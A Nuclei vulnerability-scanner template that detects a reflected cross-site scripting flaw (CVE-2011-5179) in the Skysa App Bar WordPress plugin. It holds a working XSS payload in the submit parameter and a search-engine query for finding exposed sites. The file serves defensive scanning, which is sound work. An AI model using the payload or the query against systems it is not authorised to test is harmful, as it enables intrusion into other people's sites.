nuclei-templates/http/cves/2011/CVE-2011-5179.yaml

63 lines
2.3 KiB
YAML

id: CVE-2011-5179
info:
name: Skysa App Bar 1.04 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5179
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71486
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2011-5179
cwe-id: CWE-79
epss-score: 0.00232
epss-percentile: 0.61346
cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: skysa
product: "skysa_app_bar_integration_plugin"
google-query: "inurl:\"/wp-content/plugins/skysa-official/\""
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Skysa App'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502202a2506e8b9e69b40dd782552d8c266a500621c29093bcef9f8654764f7b7c87d0221008d4c442a6894e2c5eed83217df00622fc53439ae7005c6d5ecdef9bf9848c666:922c64590222798bb761d5b6d8e72950